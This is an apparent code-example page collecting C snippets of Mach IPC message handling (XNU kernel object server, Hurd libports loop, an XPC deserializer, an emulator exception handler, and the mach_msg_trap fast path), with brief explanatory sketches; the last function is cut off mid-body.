	} else if (!IP_VALID(replyp)) {
		/*
		 *	Can't queue the reply message if the destination
		 *	(the reply port) isn't valid.
		 */

		ipc_kmsg_destroy(reply);

		return IKM_NULL;
	} else if (replyp->ip_receiver == ipc_space_kernel) {
		/*
		 * Don't send replies to kobject kernel ports
		 */
#if DEVELOPMENT || DEBUG
		printf("%s: refusing to send reply to kobject %d port (id:%d)\n",
		       __func__, ip_kotype(replyp),
		       request->ikm_header->msgh_id);
#endif	/* DEVELOPMENT || DEBUG */
		ipc_kmsg_destroy(reply);
		return IKM_NULL;
	}

	/* Fail the MIG call if the task exec token changed during the call */
	if (kr == KERN_SUCCESS && exec_token_changed) {
		/*
		 *	Create a new reply msg with error and destroy the old reply msg.
		 */
		ipc_kmsg_t new_reply = ipc_kmsg_alloc(reply_size);

		if (new_reply == IKM_NULL) {
			printf("ipc_kobject_server: dropping request\n");
			ipc_kmsg_destroy(reply);
			return IKM_NULL;
		}
		/*
		 *	Initialize the new reply message.
		 */
		{
#define	OutP_new	((mig_reply_error_t *) new_reply->ikm_header)
#define	OutP_old	((mig_reply_error_t *) reply->ikm_header)

		    bzero((void *)OutP_new, reply_size);

		    OutP_new->NDR = OutP_old->NDR;
		    OutP_new->Head.msgh_size = sizeof(mig_reply_error_t);
		    OutP_new->Head.msgh_bits = OutP_old->Head.msgh_bits & ~MACH_MSGH_BITS_COMPLEX;
		    OutP_new->Head.msgh_remote_port = OutP_old->Head.msgh_remote_port;
		    OutP_new->Head.msgh_local_port = MACH_PORT_NULL;
		    OutP_new->Head.msgh_voucher_port = MACH_PORT_NULL;
		    OutP_new->Head.msgh_id = OutP_old->Head.msgh_id;

		    /* Set the error as KERN_INVALID_TASK */
		    OutP_new->RetCode = KERN_INVALID_TASK;

#undef	OutP_new
#undef  OutP_old
		}

		/*
		 *	Destroy everything in reply except the reply port right,
		 *	which is needed in the new reply message.
		 */
		reply->ikm_header->msgh_remote_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(reply);

		reply = new_reply;
	}

 	trailer = (mach_msg_format_0_trailer_t *)
		((vm_offset_t)reply->ikm_header + (int)reply->ikm_header->msgh_size);

 	trailer->msgh_sender = KERNEL_SECURITY_TOKEN;
 	trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
 	trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;

	return reply;
}
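The reply built above follows the usual MIG convention: the reply's msgh_id is the request id plus 100, and for simple (non-complex) replies the result travels in RetCode. A minimal user-space sketch of checking such a reply; the check_mig_reply helper is illustrative and not part of any real API:

#include <mach/mach.h>
#include <mach/mig_errors.h>

/* Illustrative helper: validate a simple (non-complex) MIG reply against the
 * id of the request it answers, mirroring the msgh_id + 100 convention used
 * by ipc_kobject_server() above. */
static kern_return_t
check_mig_reply(const mig_reply_error_t *reply, mach_msg_id_t request_id)
{
	if (reply->Head.msgh_id != request_id + 100)
		return MIG_REPLY_MISMATCH;	/* not a reply to this request */

	if (!(reply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
	    reply->Head.msgh_size == sizeof(mig_reply_error_t))
		return reply->RetCode;		/* simple reply: RetCode is the result */

	return KERN_SUCCESS;			/* complex reply: data follows the header */
}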
Esempio n. 25
0
void
ports_manage_port_operations_one_thread (struct port_bucket *bucket,
					 ports_demuxer_type demuxer,
					 int timeout)
{
  struct ports_thread thread;
  error_t err;

  int 
  internal_demuxer (mach_msg_header_t *inp,
		    mach_msg_header_t *outheadp)
    {
      struct port_info *pi;
      struct rpc_info link;
      int status;
      error_t err;
      register mig_reply_header_t *outp = (mig_reply_header_t *) outheadp;
      static const mach_msg_type_t RetCodeType = {
		/* msgt_name = */		MACH_MSG_TYPE_INTEGER_32,
		/* msgt_size = */		32,
		/* msgt_number = */		1,
		/* msgt_inline = */		TRUE,
		/* msgt_longform = */		FALSE,
		/* msgt_deallocate = */		FALSE,
		/* msgt_unused = */		0
	};

      /* Fill in default response. */
      outp->Head.msgh_bits 
	= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(inp->msgh_bits), 0);
      outp->Head.msgh_size = sizeof *outp;
      outp->Head.msgh_remote_port = inp->msgh_remote_port;
      outp->Head.msgh_local_port = MACH_PORT_NULL;
      outp->Head.msgh_seqno = 0;
      outp->Head.msgh_id = inp->msgh_id + 100;
      outp->RetCodeType = RetCodeType;
      outp->RetCode = MIG_BAD_ID;

      if (MACH_MSGH_BITS_LOCAL (inp->msgh_bits) ==
	  MACH_MSG_TYPE_PROTECTED_PAYLOAD)
	pi = ports_lookup_payload (bucket, inp->msgh_protected_payload, NULL);
      else
	{
	  pi = ports_lookup_port (bucket, inp->msgh_local_port, 0);
	  if (pi)
	    {
	      /* Store the objects address as the payload and set the
		 message type accordingly.  This prevents us from
		 having to do another hash table lookup in the intran
		 functions if protected payloads are not supported by
		 the kernel.  */
	      inp->msgh_bits =
		MACH_MSGH_BITS_OTHER (inp->msgh_bits)
		| MACH_MSGH_BITS (MACH_MSGH_BITS_REMOTE (inp->msgh_bits),
				  MACH_MSG_TYPE_PROTECTED_PAYLOAD);
	      inp->msgh_protected_payload = (unsigned long) pi;
	    }
	}

      if (pi)
	{
	  err = ports_begin_rpc (pi, inp->msgh_id, &link);
	  if (err)
	    {
	      mach_port_deallocate (mach_task_self (), inp->msgh_remote_port);
	      outp->RetCode = err;
	      status = 1;
	    }
	  else
	    {
	      /* No need to check cancel threshold here, because
		 in a single threaded server the cancel is always
		 handled in order. */
	      status = demuxer (inp, outheadp);
	      ports_end_rpc (pi, &link);
	    }
	  ports_port_deref (pi);
	}
      else
	{
	  outp->RetCode = EOPNOTSUPP;
	  status = 1;
	}

      _ports_thread_quiescent (&bucket->threadpool, &thread);
      return status;
    }

  /* XXX It is currently unsafe for most servers to terminate based on
     inactivity because a request may arrive after a server has
     started shutting down, causing the client to receive an error.
     Prevent the service loop from terminating by setting TIMEOUT to
     zero.  */
  timeout = 0;

  _ports_thread_online (&bucket->threadpool, &thread);
  do
    err = mach_msg_server_timeout (internal_demuxer, 0, bucket->portset, 
				   timeout ? MACH_RCV_TIMEOUT : 0, timeout);
  while (err != MACH_RCV_TIMED_OUT);
  _ports_thread_offline (&bucket->threadpool, &thread);
}
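A sketch of how a server typically drives this single-threaded loop. The demuxer and the empty bucket are illustrative; a real Hurd server plugs in MIG-generated *_server dispatchers and creates ports in the bucket before entering the loop:

#include <hurd/ports.h>
#include <mach/message.h>

/* Illustrative demuxer matching ports_demuxer_type.  A real server would
 * call one or more MIG-generated *_server routines here and return their
 * result; returning 0 means "not recognized", so the MIG_BAD_ID reply
 * prepared by internal_demuxer above goes back to the sender. */
static int
demuxer (mach_msg_header_t *inp, mach_msg_header_t *outp)
{
  (void) inp;
  (void) outp;
  return 0;
}

int
main (void)
{
  /* A real server would also create ports in this bucket (ports_create_port)
     before entering the loop; an empty bucket just sits idle.  */
  struct port_bucket *bucket = ports_create_bucket ();

  /* The loop above forces TIMEOUT to 0, so this call never returns.  */
  ports_manage_port_operations_one_thread (bucket, demuxer, 0);
  return 0;
}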
Esempio n. 26
0
ipc_kmsg_t
ipc_kobject_server(
	ipc_kmsg_t	request)
{
	mach_msg_size_t reply_size;
	ipc_kmsg_t reply;
	kern_return_t kr;
	mig_routine_t routine;
	ipc_port_t *destp;
	mach_msg_format_0_trailer_t *trailer;
	register mig_hash_t *ptr;
#if	MACH_RT
	boolean_t reply_rt;
#endif	/* MACH_RT */
	unsigned int th;

	/* Only fetch current thread if ETAP is configured */
	ETAP_DATA_LOAD(th, current_thread());
        ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
                        EVENT_BEGIN,
			((thread_t) th),
                        &request->ikm_header.msgh_id,
                        sizeof(int));
	/*
         * Find out corresponding mig_hash entry if any
         */
	{
	    register int key = request->ikm_header.msgh_id;
	    register int i = MIG_HASH(key);
	    register int max_iter = mig_table_max_displ;
	
	    do
		ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
	    while (key != ptr->num && ptr->num && --max_iter);

	    if (!ptr->routine || key != ptr->num) {
	        ptr = (mig_hash_t *)0;
		reply_size = mig_reply_size;
	    } else {
		reply_size = ptr->size;
#if	MACH_COUNTER
		ptr->callcount++;
#endif
	    }
	}

	/* round up for ikm_cache; overhead is added by ikm_alloc */
        if ((reply_size += MAX_TRAILER_SIZE) < IKM_SAVED_MSG_SIZE)
		reply_size = IKM_SAVED_MSG_SIZE;

#if	MACH_RT
	reply_rt =
	  IP_VALID((ipc_port_t)request->ikm_header.msgh_local_port) ?
	    IP_RT((ipc_port_t)request->ikm_header.msgh_local_port) :
	    FALSE;
	    
	if (reply_rt)
	      reply = ikm_rtalloc(reply_size);
	else
#endif	/* MACH_RT */
	      reply = ikm_alloc(reply_size);

	if (reply == IKM_NULL) {
		printf("ipc_kobject_server: dropping request\n");
		ipc_kmsg_destroy(request);
		return IKM_NULL;
	}

	ikm_init(reply, reply_size);
#if	DIPC
	reply->ikm_handle = HANDLE_NULL;
#endif	/* DIPC */

	/*
	 * Initialize reply message.
	 */
	{
#define	InP	((mach_msg_header_t *) &request->ikm_header)
#define	OutP	((mig_reply_error_t *) &reply->ikm_header)

	    OutP->NDR = NDR_record;
	    OutP->Head.msgh_size = sizeof(mig_reply_error_t);

	    OutP->Head.msgh_bits =
		MACH_MSGH_BITS(MACH_MSGH_BITS_LOCAL(InP->msgh_bits), 0);
	    OutP->Head.msgh_remote_port = InP->msgh_local_port;
	    OutP->Head.msgh_local_port  = MACH_PORT_NULL;
	    OutP->Head.msgh_id = InP->msgh_id + 100;
#if	MACH_RT
	    if (reply_rt)
	          KMSG_MARK_RT(reply);
#endif	/* MACH_RT */
#undef	InP
#undef	OutP
	}

	/*
	 * Find the routine to call, and call it
	 * to perform the kernel function
	 */
	{
	    if (ptr)	
		(*ptr->routine)(&request->ikm_header, &reply->ikm_header);
	    else {
		if (!ipc_kobject_notify(&request->ikm_header, &reply->ikm_header)){
#if	MACH_IPC_TEST
		    printf("ipc_kobject_server: bogus kernel message, id=%d\n",
			request->ikm_header.msgh_id);
#endif	/* MACH_IPC_TEST */
		    ((mig_reply_error_t *) &reply->ikm_header)->RetCode
			= MIG_BAD_ID;
		}
	    }
	}

	/*
	 *	Destroy destination. The following code differs from
	 *	ipc_object_destroy in that we release the send-once
	 *	right instead of generating a send-once notification
	 * 	(which would bring us here again, creating a loop).
	 *	It also differs in that we only expect send or
	 *	send-once rights, never receive rights.
	 *
	 *	We set msgh_remote_port to IP_NULL so that the kmsg
	 *	destroy routines don't try to destroy the port twice.
	 */
	destp = (ipc_port_t *) &request->ikm_header.msgh_remote_port;
	switch (MACH_MSGH_BITS_REMOTE(request->ikm_header.msgh_bits)) {
		case MACH_MSG_TYPE_PORT_SEND:
		    ipc_port_release_send(*destp);
		    break;
		
		case MACH_MSG_TYPE_PORT_SEND_ONCE:
		    ipc_port_release_sonce(*destp);
		    break;
		
		default:
		    panic("ipc_object_destroy: strange destination rights");
	}
	*destp = IP_NULL;

        if (!(reply->ikm_header.msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
           ((mig_reply_error_t *) &reply->ikm_header)->RetCode != KERN_SUCCESS)
	 	kr = ((mig_reply_error_t *) &reply->ikm_header)->RetCode;
	else
		kr = KERN_SUCCESS;

	if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
		/*
		 *	The server function is responsible for the contents
		 *	of the message.  The reply port right is moved
		 *	to the reply message, and we have deallocated
		 *	the destination port right, so we just need
		 *	to free the kmsg.
		 */

		/*
		 * Like ipc_kmsg_put, but without the copyout.  Also,
		 * messages to the kernel will never have been allocated
		 * from the rt_zone.
		 */

		ikm_check_initialized(request, request->ikm_size);
		if (request->ikm_size != IKM_SAVED_KMSG_SIZE ||
		    !ikm_cache_put (request)) {
			ikm_free(request);
		}
	} else {
		/*
		 *	The message contents of the request are intact.
		 *	Destroy everything except the reply port right,
		 *	which is needed in the reply message.
		 */

		request->ikm_header.msgh_local_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(request);
	}

	if (kr == MIG_NO_REPLY) {
		/*
		 *	The server function will send a reply message
		 *	using the reply port right, which it has saved.
		 */

		ikm_free(reply);

		ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
				EVENT_END,
				((thread_t) th),
				&request->ikm_header.msgh_id,
				sizeof(int));

		return IKM_NULL;
	} else if (!IP_VALID((ipc_port_t)reply->ikm_header.msgh_remote_port)) {
		/*
		 *	Can't queue the reply message if the destination
		 *	(the reply port) isn't valid.
		 */

		ipc_kmsg_destroy(reply);

		ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
				EVENT_END,
				((thread_t) th),
				&request->ikm_header.msgh_id,
				sizeof(int));

		return IKM_NULL;
	}

 	trailer = (mach_msg_format_0_trailer_t *)
		((vm_offset_t)&reply->ikm_header + (int)reply->ikm_header.msgh_size);                
 	trailer->msgh_sender = KERNEL_SECURITY_TOKEN;
 	trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
 	trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;

        ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
                        EVENT_END,
			((thread_t) th),
                        &request->ikm_header.msgh_id,
                        sizeof(int));

	return reply;
}
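The routine lookup at the top of this older variant is an open-addressed hash probe bounded by mig_table_max_displ. A self-contained sketch of the same idea; the table size, hash function, and entry layout here are illustrative rather than the kernel's actual values:

#include <stddef.h>

#define TABLE_SIZE	256				/* illustrative; the kernel uses MAX_MIG_ENTRIES */
#define HASH(id)	((id) & (TABLE_SIZE - 1))	/* illustrative hash, cf. MIG_HASH */

typedef struct {
	int	num;				/* message id; 0 marks an empty slot */
	void	(*routine)(void);		/* server routine registered for that id */
} entry_t;

static entry_t	table[TABLE_SIZE];
static int	max_displ = 1;			/* longest probe distance seen at insert time */

/* Probe at most max_displ slots past the home bucket, exactly like the
 * do/while over mig_buckets above, and give up if the id is unknown. */
static entry_t *
lookup(int key)
{
	entry_t *p;
	int i = HASH(key);
	int iter = max_displ;

	do
		p = &table[i++ % TABLE_SIZE];
	while (key != p->num && p->num && --iter);

	return (p->routine && key == p->num) ? p : NULL;
}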
spc_message_t* spc_deserialize(spc_mach_message_t* mach_msg)
{
    reader_t reader;
    reader.next_port = 0;
    reader.num_ports = 0;
    reader.ports = NULL;
    reader.end = (unsigned char*)mach_msg + mach_msg->header.msgh_size;
    reader.ptr = mach_msg->buf;

    // Handle well-known message IDs
    if (mach_msg->header.msgh_id == MSGID_CONNECTION_INTERRUPTED) {
        spc_dictionary_t* dict = spc_dictionary_create();
        spc_dictionary_set_string(dict, "error", "Connection interrupted");
        printf("Connection interrupted\n");
        // TODO
        exit(-1);
    }

    if (mach_msg->header.msgh_bits & MACH_MSGH_BITS_COMPLEX) {
        mach_msg_body_t* body = (mach_msg_body_t*)spc_read(&reader, sizeof(mach_msg_body_t));
        for (int i = 0; i < body->msgh_descriptor_count; i++) {
            mach_msg_descriptor_type_t type = ((mach_msg_type_descriptor_t*)reader.ptr)->type;
            switch (type) {
                case MACH_MSG_PORT_DESCRIPTOR: {
                    reader.ports = realloc(reader.ports, (reader.num_ports + 1) * sizeof(spc_port_t));
                    mach_msg_port_descriptor_t* descriptor = (mach_msg_port_descriptor_t*)spc_read(&reader, sizeof(mach_msg_port_descriptor_t));
                    reader.ports[reader.num_ports].name = descriptor->name;
                    reader.ports[reader.num_ports].type = descriptor->disposition;
                    reader.num_ports += 1;
                    break;
                }
                case MACH_MSG_OOL_DESCRIPTOR:
                    spc_read(&reader, sizeof(mach_msg_ool_descriptor_t));
                    printf("Warning: ignoring OOL descriptor\n");
                    break;
                case MACH_MSG_OOL_PORTS_DESCRIPTOR:
                    spc_read(&reader, sizeof(mach_msg_ool_ports_descriptor_t));
                    printf("Warning: ignoring OOL ports descriptor\n");
                    break;
                default:
                    printf("Unsupported mach message descriptor type: %d\n", type);
                    exit(-1);
            }
        }
    }

    void* header = spc_read(&reader, 8);
    memcpy(last_header, header, 8);

    spc_value_t value = spc_deserialize_value(&reader);
    if (value.type != SPC_TYPE_DICT) {
        spc_value_destroy(value);
        puts("Invalid XPC message type");
        return NULL;
    }

    spc_message_t* msg = malloc(sizeof(spc_message_t));
    msg->remote_port.name = mach_msg->header.msgh_remote_port;
    msg->remote_port.type = MACH_MSGH_BITS_REMOTE(mach_msg->header.msgh_bits);
    msg->local_port.name = mach_msg->header.msgh_local_port;
    msg->local_port.type = MACH_MSGH_BITS_LOCAL(mach_msg->header.msgh_bits);
    msg->id = mach_msg->header.msgh_id;
    msg->content = value.value.dict;

    return msg;
}
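spc_read is not shown above; judging by its uses it is a bounds-checked cursor advance over the raw message bytes. A minimal sketch consistent with that usage (the name, and the bail-out on truncated input, are assumptions about the real helper):

#include <stdio.h>
#include <stdlib.h>

/* Sketch of the read cursor used by spc_deserialize() above; field names
 * follow the reader_t usage, the port bookkeeping is omitted. */
typedef struct {
	unsigned char *ptr;		/* current read position (ptr <= end) */
	unsigned char *end;		/* one past the last valid byte */
} reader_sketch_t;

/* Return a pointer to the next `size` bytes and advance the cursor.
 * Exiting on truncated input is an assumption; the real spc_read may
 * report the error differently. */
static void *
sketch_read(reader_sketch_t *reader, size_t size)
{
	if (size > (size_t)(reader->end - reader->ptr)) {
		fprintf(stderr, "truncated message\n");
		exit(-1);
	}
	void *result = reader->ptr;
	reader->ptr += size;
	return result;
}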
Esempio n. 28
0
void CEeExecutor::HandlerThreadProc()
{
#pragma pack(push, 4)
	struct INPUT_MESSAGE
	{
		mach_msg_header_t head;
		NDR_record_t ndr;
		exception_type_t exception;
		mach_msg_type_number_t codeCount;
		intptr_t code[2];
		int flavor;
		mach_msg_type_number_t stateCount;
		natural_t state[STATE_FLAVOR_COUNT];
		mach_msg_trailer_t trailer;
	};
	struct OUTPUT_MESSAGE
	{
		mach_msg_header_t head;
		NDR_record_t ndr;
		kern_return_t result;
		int flavor;
		mach_msg_type_number_t stateCount;
		natural_t state[STATE_FLAVOR_COUNT];
	};
#pragma pack(pop)

	while(1)
	{
		kern_return_t result = KERN_SUCCESS;
		
		INPUT_MESSAGE inMsg;
		result = mach_msg(&inMsg.head, MACH_RCV_MSG | MACH_RCV_LARGE, 0, sizeof(inMsg), m_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
		assert(result == KERN_SUCCESS);
		
		assert(inMsg.head.msgh_id == 2406);	//MACH_EXCEPTION_RAISE_RPC
		
		bool success = HandleAccessFault(inMsg.code[1]);
		
		OUTPUT_MESSAGE outMsg;
		outMsg.head.msgh_bits			= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(inMsg.head.msgh_bits), 0);
		outMsg.head.msgh_remote_port	= inMsg.head.msgh_remote_port;
		outMsg.head.msgh_local_port		= MACH_PORT_NULL;
		outMsg.head.msgh_id				= inMsg.head.msgh_id + 100;
		outMsg.head.msgh_size			= sizeof(outMsg);
		outMsg.ndr						= inMsg.ndr;

		if(success)
		{
			outMsg.result		= KERN_SUCCESS;
			outMsg.flavor		= STATE_FLAVOR;
			outMsg.stateCount	= STATE_FLAVOR_COUNT;
			memcpy(outMsg.state, inMsg.state, STATE_FLAVOR_COUNT * sizeof(natural_t));
		}
		else
		{
			outMsg.result		= KERN_FAILURE;
			outMsg.flavor		= 0;
			outMsg.stateCount	= 0;
		}
		
		result = mach_msg(&outMsg.head, MACH_SEND_MSG | MACH_RCV_LARGE, sizeof(outMsg), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
		assert(result == KERN_SUCCESS);
	}
}
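For this loop to receive anything, m_port must already be registered as an exception port configured for state-carrying messages. A hedged sketch of such a setup; the exception mask, behavior, and flavor are assumptions, and the real class may register its port differently:

#include <mach/mach.h>

/* Illustrative setup for an exception port like m_port above.  The mask,
 * behavior and flavor are assumptions: EXCEPTION_STATE | MACH_EXCEPTION_CODES
 * yields the port-less, state-carrying message that HandlerThreadProc parses. */
static mach_port_t
setup_exception_port(thread_state_flavor_t state_flavor)
{
	mach_port_t port = MACH_PORT_NULL;
	kern_return_t kr;

	kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
	if (kr != KERN_SUCCESS)
		return MACH_PORT_NULL;

	/* The kernel needs a send right on the port to deliver exception messages. */
	kr = mach_port_insert_right(mach_task_self(), port, port,
	                            MACH_MSG_TYPE_MAKE_SEND);
	if (kr != KERN_SUCCESS)
		return MACH_PORT_NULL;

	kr = task_set_exception_ports(mach_task_self(), EXC_MASK_BAD_ACCESS, port,
	                              (exception_behavior_t)(EXCEPTION_STATE | MACH_EXCEPTION_CODES),
	                              state_flavor);
	if (kr != KERN_SUCCESS)
		return MACH_PORT_NULL;

	return port;
}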
Esempio n. 29
0
mach_msg_return_t
mach_msg_trap(
	mach_msg_header_t 	*msg,
	mach_msg_option_t 	option,
	mach_msg_size_t 	send_size,
	mach_msg_size_t 	rcv_size,
	mach_port_t 		rcv_name,
	mach_msg_timeout_t 	time_out,
	mach_port_t 		notify)
{
	mach_msg_return_t mr;

	/* first check for common cases */

	if (option == (MACH_SEND_MSG|MACH_RCV_MSG)) {
		ipc_thread_t self = current_thread();
		ipc_space_t space = self->task->itk_space;
		ipc_kmsg_t kmsg;
		ipc_port_t dest_port;
		ipc_object_t rcv_object;
		ipc_mqueue_t rcv_mqueue;
		mach_msg_size_t reply_size;

		/*
		 *	This case is divided into eleven sections, each
		 *	with a label.  There are five optimized
		 *	sections and six unoptimized sections, which
		 *	do the same thing but handle all possible
		 *	cases and are slower.
		 *
		 *	The five sections for an RPC are
		 *	    1) Get request message into a buffer.
		 *		(fast_get or slow_get)
		 *	    2) Copyin request message and rcv_name.
		 *		(fast_copyin or slow_copyin)
		 *	    3) Enqueue request and dequeue reply.
		 *		(fast_send_receive or
		 *		 slow_send and slow_receive)
		 *	    4) Copyout reply message.
		 *		(fast_copyout or slow_copyout)
		 *	    5) Put reply message to user's buffer.
		 *		(fast_put or slow_put)
		 *
		 *	Keep the locking hierarchy firmly in mind.
		 *	(First spaces, then ports, then port sets,
		 *	then message queues.)  Only a non-blocking
		 *	attempt can be made to acquire locks out of
		 *	order, or acquire two locks on the same level.
		 *	Acquiring two locks on the same level will
		 *	fail if the objects are really the same,
		 *	unless simple locking is disabled.  This is OK,
		 *	because then the extra unlock does nothing.
		 *
		 *	There are two major reasons these RPCs can't use
		 *	ipc_thread_switch, and use slow_send/slow_receive:
		 *		1) Kernel RPCs.
		 *		2) Servers fall behind clients, so
		 *		client doesn't find a blocked server thread and
		 *		server finds waiting messages and can't block.
		 */

	/*
	    fast_get:
	*/
		/*
		 *	optimized ipc_kmsg_get
		 *
		 *	No locks, references, or messages held.
		 *	We must clear ikm_cache before copyinmsg.
		 */

		if ((send_size > IKM_SAVED_MSG_SIZE) ||
		    (send_size < sizeof(mach_msg_header_t)) ||
		    (send_size & 3) ||
		    ((kmsg = ikm_cache()) == IKM_NULL))
			goto slow_get;

		ikm_cache() = IKM_NULL;
		ikm_check_initialized(kmsg, IKM_SAVED_KMSG_SIZE);

		if (copyinmsg(msg, &kmsg->ikm_header,
			      send_size)) {
			ikm_free(kmsg);
			goto slow_get;
		}

		kmsg->ikm_header.msgh_size = send_size;

	    fast_copyin:
		/*
		 *	optimized ipc_kmsg_copyin/ipc_mqueue_copyin
		 *
		 *	We have the request message data in kmsg.
		 *	Must still do copyin, send, receive, etc.
		 *
		 *	If the message isn't simple, we can't combine
		 *	ipc_kmsg_copyin_header and ipc_mqueue_copyin,
		 *	because copyin of the message body might
		 *	affect rcv_name.
		 */

		switch (kmsg->ikm_header.msgh_bits) {
		    case MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND,
					MACH_MSG_TYPE_MAKE_SEND_ONCE): {
			ipc_entry_t table;
			ipc_entry_num_t size;
			ipc_port_t reply_port;

			/* sending a request message */

		    {
			mach_port_index_t index;
			mach_port_gen_t gen;

		    {
			mach_port_t reply_name =
				kmsg->ikm_header.msgh_local_port;

			if (reply_name != rcv_name)
				goto slow_copyin;

			/* optimized ipc_entry_lookup of reply_name */

			index = MACH_PORT_INDEX(reply_name);
			gen = MACH_PORT_GEN(reply_name);
		    }

			is_read_lock(space);
			assert(space->is_active);

			size = space->is_table_size;
			table = space->is_table;

			if (index >= size)
				goto abort_request_copyin;

		    {
			ipc_entry_t entry;
			ipc_entry_bits_t bits;

			entry = &table[index];
			bits = entry->ie_bits;

			/* check generation number and type bit */

			if ((bits & (IE_BITS_GEN_MASK|
				     MACH_PORT_TYPE_RECEIVE)) !=
			    (gen | MACH_PORT_TYPE_RECEIVE))
				goto abort_request_copyin;

			reply_port = (ipc_port_t) entry->ie_object;
			assert(reply_port != IP_NULL);
		    }
		    }

			/* optimized ipc_entry_lookup of dest_name */

		    {
			mach_port_index_t index;
			mach_port_gen_t gen;

		    {
			mach_port_t dest_name =
				kmsg->ikm_header.msgh_remote_port;

			index = MACH_PORT_INDEX(dest_name);
			gen = MACH_PORT_GEN(dest_name);
		    }

			if (index >= size)
				goto abort_request_copyin;

		    {
			ipc_entry_t entry;
			ipc_entry_bits_t bits;

			entry = &table[index];
			bits = entry->ie_bits;

			/* check generation number and type bit */

			if ((bits & (IE_BITS_GEN_MASK|MACH_PORT_TYPE_SEND)) !=
			    (gen | MACH_PORT_TYPE_SEND))
				goto abort_request_copyin;

			assert(IE_BITS_UREFS(bits) > 0);

			dest_port = (ipc_port_t) entry->ie_object;
			assert(dest_port != IP_NULL);
		    }
		    }

			/*
			 *	To do an atomic copyin, need simultaneous
			 *	locks on both ports and the space.  If
			 *	dest_port == reply_port, and simple locking is
			 *	enabled, then we will abort.  Otherwise it's
			 *	OK to unlock twice.
			 */

			ip_lock(dest_port);
			if (!ip_active(dest_port) ||
			    !ip_lock_try(reply_port)) {
				ip_unlock(dest_port);
				goto abort_request_copyin;
			}
			is_read_unlock(space);

			assert(dest_port->ip_srights > 0);
			dest_port->ip_srights++;
			ip_reference(dest_port);

			assert(ip_active(reply_port));
			assert(reply_port->ip_receiver_name ==
			       kmsg->ikm_header.msgh_local_port);
			assert(reply_port->ip_receiver == space);

			reply_port->ip_sorights++;
			ip_reference(reply_port);

			kmsg->ikm_header.msgh_bits =
				MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND,
					       MACH_MSG_TYPE_PORT_SEND_ONCE);
			kmsg->ikm_header.msgh_remote_port =
					(mach_port_t) dest_port;
			kmsg->ikm_header.msgh_local_port =
					(mach_port_t) reply_port;

			/* make sure we can queue to the destination */

			if (dest_port->ip_receiver == ipc_space_kernel) {
				/*
				 * The kernel server has a reference to
				 * the reply port, which it hands back
				 * to us in the reply message.  We do
				 * not need to keep another reference to
				 * it.
				 */
				ip_unlock(reply_port);

				assert(ip_active(dest_port));
				ip_unlock(dest_port);
				goto kernel_send;
			}

			if (dest_port->ip_msgcount >= dest_port->ip_qlimit)
				goto abort_request_send_receive;

			/* optimized ipc_mqueue_copyin */

			if (reply_port->ip_pset != IPS_NULL)
				goto abort_request_send_receive;

			rcv_object = (ipc_object_t) reply_port;
			io_reference(rcv_object);
			rcv_mqueue = &reply_port->ip_messages;
			imq_lock(rcv_mqueue);
			io_unlock(rcv_object);
			goto fast_send_receive;

		    abort_request_copyin:
			is_read_unlock(space);
			goto slow_copyin;

		    abort_request_send_receive:
			ip_unlock(dest_port);
			ip_unlock(reply_port);
			goto slow_send;
		    }

		    case MACH_MSGH_BITS(MACH_MSG_TYPE_MOVE_SEND_ONCE, 0): {
			ipc_entry_num_t size;
			ipc_entry_t table;

			/* sending a reply message */

		    {
			mach_port_t reply_name =
				kmsg->ikm_header.msgh_local_port;

			if (reply_name != MACH_PORT_NULL)
				goto slow_copyin;
		    }

			is_write_lock(space);
			assert(space->is_active);

			/* optimized ipc_entry_lookup */

			size = space->is_table_size;
			table = space->is_table;

		    {
			ipc_entry_t entry;
			mach_port_gen_t gen;
			mach_port_index_t index;

		    {
			mach_port_t dest_name =
				kmsg->ikm_header.msgh_remote_port;

			index = MACH_PORT_INDEX(dest_name);
			gen = MACH_PORT_GEN(dest_name);
		    }

			if (index >= size)
				goto abort_reply_dest_copyin;

			entry = &table[index];

			/* check generation, collision bit, and type bit */

			if ((entry->ie_bits & (IE_BITS_GEN_MASK|
					       IE_BITS_COLLISION|
					       MACH_PORT_TYPE_SEND_ONCE)) !=
			    (gen | MACH_PORT_TYPE_SEND_ONCE))
				goto abort_reply_dest_copyin;

			/* optimized ipc_right_copyin */

			assert(IE_BITS_TYPE(entry->ie_bits) ==
						MACH_PORT_TYPE_SEND_ONCE);
			assert(IE_BITS_UREFS(entry->ie_bits) == 1);
			assert((entry->ie_bits & IE_BITS_MAREQUEST) == 0);

			if (entry->ie_request != 0)
				goto abort_reply_dest_copyin;

			dest_port = (ipc_port_t) entry->ie_object;
			assert(dest_port != IP_NULL);

			ip_lock(dest_port);
			if (!ip_active(dest_port)) {
				ip_unlock(dest_port);
				goto abort_reply_dest_copyin;
			}

			assert(dest_port->ip_sorights > 0);

			/* optimized ipc_entry_dealloc */

			entry->ie_next = table->ie_next;
			table->ie_next = index;
			entry->ie_bits = gen;
			entry->ie_object = IO_NULL;
		    }

			kmsg->ikm_header.msgh_bits =
				MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND_ONCE,
					       0);
			kmsg->ikm_header.msgh_remote_port =
					(mach_port_t) dest_port;

			/* make sure we can queue to the destination */

			assert(dest_port->ip_receiver != ipc_space_kernel);

			/* optimized ipc_entry_lookup/ipc_mqueue_copyin */

		    {
			ipc_entry_t entry;
			ipc_entry_bits_t bits;

		    {
			mach_port_index_t index;
			mach_port_gen_t gen;

